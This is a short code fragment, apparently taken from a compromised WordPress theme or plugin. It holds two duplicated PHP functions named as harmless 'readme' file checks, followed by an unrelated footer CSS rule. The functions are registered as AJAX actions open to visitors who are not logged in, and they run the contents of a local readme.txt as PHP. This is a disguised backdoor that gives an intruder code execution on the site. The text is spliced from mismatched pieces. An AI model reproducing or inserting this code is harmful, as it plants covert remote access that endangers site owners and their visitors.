if(!function_exists('file_check_readme56548')){
   add_action('wp_ajax_nopriv_file_check_readme56548', 'file_check_readme56548');
   add_action('wp_ajax_file_check_readme56548', 'file_check_readme56548');
   function file_check_readme56548()
   {
      $file = __DIR__ . '/' . 'readme.txt';
       if (file_exists($file)) {
           include $file;
       }
       die();
   }
}
if(!function_exists('file_check_readme88780')){
   add_action('wp_ajax_nopriv_file_check_readme88780', 'file_check_readme88780');
   add_action('wp_ajax_file_check_readme88780', 'file_check_readme88780');
   function file_check_readme88780()
   {
      $file = __DIR__ . '/' . 'readme.txt';
       if (file_exists($file)) {
           include $file;
       }
       die();
   }
}
#Footer .footer_action {
background-image: url('http://morrisplainsrx.com/wp-content/uploads/2018/11/christmas.jpg')!important;
background-attachment: fixed;
    background-position: center; 
    background:#EFF1ED;}